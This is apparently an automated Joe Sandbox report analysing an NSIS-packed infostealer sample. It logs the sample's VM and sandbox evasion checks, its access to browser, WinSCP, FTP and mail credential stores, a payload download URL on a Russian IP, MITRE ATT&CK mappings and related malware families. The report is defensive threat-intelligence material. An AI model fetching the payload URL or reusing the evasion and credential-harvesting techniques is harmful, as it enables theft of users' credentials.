Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\discomposed.non	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\dred.jpg	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\gametophoric.txt	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\isocola.sol	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bog	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kal	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cem	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\podagrist.ref	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\soliloquium.bor	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\thoroughwort.ret	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\torminal.wes	Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Memory allocated: 120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Memory allocated: 37610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Memory allocated: 37530000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\99200032052824.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_004062A3 FindFirstFileA,FindClose,	5_2_004062A3
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 5_2_004026FE FindFirstFileA,	5_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	9_2_00405768
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_004026FE FindFirstFileA,	9_2_004026FE
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Code function: 9_2_004062A3 FindFirstFileA,FindClose,	9_2_004062A3

Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe	API call chain: ExitProcess graph end node			graph_5-4690
Source: C:\Users\user\Desktop\99200032052824.bat.exe	API call chain: ExitProcess graph end node			graph_5-4511

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_00402340 LdrInitializeThunk,GetPrivateProfileStringA,

5_2_00402340

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

5_2_73A31A98

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Process created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"

Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe	Queries volume information: C:\Users\user\Desktop\99200032052824.bat.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Code function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

5_2_0040320C

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\99200032052824.bat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\99200032052824.bat.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\99200032052824.bat.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match

File source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	4 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	36 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	32 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	23 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	23 Virtualization/Sandbox Evasion	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
99200032052824.bat.exe	13%	ReversingLabs
99200032052824.bat.exe	20%	Virustotal	Browse
99200032052824.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ip-api.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://109.248.151.11/LZJRCXHEEshk185.bin	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://ip-api.com/line/?fields=hosting	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal		Browse
http://ip-api.com/line/?fields=hosting	0%	Virustotal		Browse
http://nsis.sf.net/NSIS_Error	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://109.248.151.11/LZJRCXHEEshk185.bin	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	99200032052824.bat.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
109.248.151.11	unknown	Russian Federation		52048	DATACLUBLV	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447846
Start date and time:	2024-05-27 09:12:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	99200032052824.bat.exe
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@3/23@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 116 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 99200032052824.bat.exe, PID 7240 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	PO_27052024.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Reiven RFQ-27-05-2024.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	ev1NIvTd6f.exe	Get hash	malicious	Unknown	Browse	/json/
	https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE	Get hash	malicious	DCRat	Browse	ip-api.com/line/?fields=hosting
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	ip-api.com/line/?fields=hosting
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.FileRepMalware.1834.13764.exe	Get hash	malicious	Discord Token Stealer, XWorm	Browse	ip-api.com/line/?fields=hosting
	NFs_468.msi	Get hash	malicious	VMdetect	Browse	ip-api.com/json/
	z23mypdfscanner-invoice3535.bat	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2aFb7hE00o.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	PO_27052024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Reiven RFQ-27-05-2024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ev1NIvTd6f.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE	Get hash	malicious	DCRat	Browse	208.95.112.1
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	208.95.112.1
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	208.95.112.1
	SecuriteInfo.com.FileRepMalware.1834.13764.exe	Get hash	malicious	Discord Token Stealer, XWorm	Browse	208.95.112.1
	NFs_468.msi	Get hash	malicious	VMdetect	Browse	208.95.112.1
	z23mypdfscanner-invoice3535.bat	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2aFb7hE00o.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	PO_27052024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Reiven RFQ-27-05-2024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ev1NIvTd6f.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDE	Get hash	malicious	DCRat	Browse	208.95.112.1
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	208.95.112.1
	uChcvn3L6R.exe	Get hash	malicious	DCRat	Browse	208.95.112.1
	SecuriteInfo.com.FileRepMalware.1834.13764.exe	Get hash	malicious	Discord Token Stealer, XWorm	Browse	208.95.112.1
	NFs_468.msi	Get hash	malicious	VMdetect	Browse	208.95.112.1
	z23mypdfscanner-invoice3535.bat	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2aFb7hE00o.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
DATACLUBLV	Rigtighed.exe	Get hash	malicious	GuLoader	Browse	46.183.222.32
	HSBC PAYMENT CONFIRMATION COPY.PDF.exe	Get hash	malicious	Remcos, GuLoader	Browse	46.183.222.32
	MB263350411AE.exe	Get hash	malicious	Nanocore	Browse	109.248.151.181
	PEDIDO DE COMPRA I122825.exe	Get hash	malicious	Remcos	Browse	46.183.223.69
	FFR.exe	Get hash	malicious	Remcos	Browse	46.183.223.35
	SecuriteInfo.com.Trojan.DownLoader46.63573.25866.32524.exe	Get hash	malicious	Remcos, AgentTesla, DBatLoader	Browse	109.248.151.108
	HSBC COPY.PDF.exe	Get hash	malicious	Remcos, GuLoader	Browse	46.183.222.32
	34003198.pdf.js	Get hash	malicious	WSHRat, VjW0rm	Browse	109.248.151.106
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5	Get hash	malicious	Remcos	Browse	46.183.222.118
	Trommels.js	Get hash	malicious	WSHRAT	Browse	46.183.223.46

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll	INQUIRY#46789-MAY_24_PRODUCTS.exe	Get hash	malicious	GuLoader	Browse
	#U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe	Get hash	malicious	Unknown	Browse
	#U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe	Get hash	malicious	Unknown	Browse
	https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exe	Get hash	malicious	Unknown	Browse
	PulseUpgradeHelperInstaller.msi	Get hash	malicious	Unknown	Browse
	VESSEL PARTICULARS & INSTRUCTIONS_docx.exe	Get hash	malicious	FormBook, GuLoader	Browse
	VESSEL PARTICULARS & INSTRUCTIONS_docx.exe	Get hash	malicious	GuLoader	Browse
	090100003400224.exe	Get hash	malicious	GuLoader	Browse
	VESSEL PARTICULARS & INSTRUCTIONS_docx.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rasterside.ini

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39
Entropy (8bit):	3.994004065616087
Encrypted:	false
SSDEEP:	3:bMQGHbS9n:fG7Gn
MD5:	DC764DAEA004E907E2A4076DC2E81DCE
SHA1:	64CC2F14C8426031E8FE9995DA24887FF5BEEC97
SHA-256:	8A3DD54ACAC47298AFA45E7048A9297F897E35CB351E511FBE5A421B1ED6523D
SHA-512:	F03E8C65E1974E8BC1608E292A9898054C791B5E8505B8BBD5F9EB832CD414C3FB19F7E328286984CC73A07937D60731DD00F20C3E31DB77245A2F178E5BF257
Malicious:	false
Reputation:	low
Preview:	[substantify]..praisably=intransitive..

C:\Users\user\AppData\Local\Temp\App.ini

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	4.7896890672920085
Encrypted:	false
SSDEEP:	3:ayWFXQLQIfLBJXlFGfv:bmXQkIPeH
MD5:	F09045A90C78C38BE8C9CBABC14C5AF5
SHA1:	0EC854B7F04157763C40DCB430DE981380BA82CF
SHA-256:	EB547F6C09B10F5824FA51272FE7EBDA82A2942209E8C795250A3A71A73789E3
SHA-512:	E10CA8614F3BD2FED1CFD752FCED2754853DA013CBA37E9258F03ECA34F5C0E9DA524989E5234349935D9BA47CF63034D73A8275D61EB9B4B7D1D90531F9981C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Loading]..Startup=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\99200032052824.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.825582780706362
Encrypted:	false
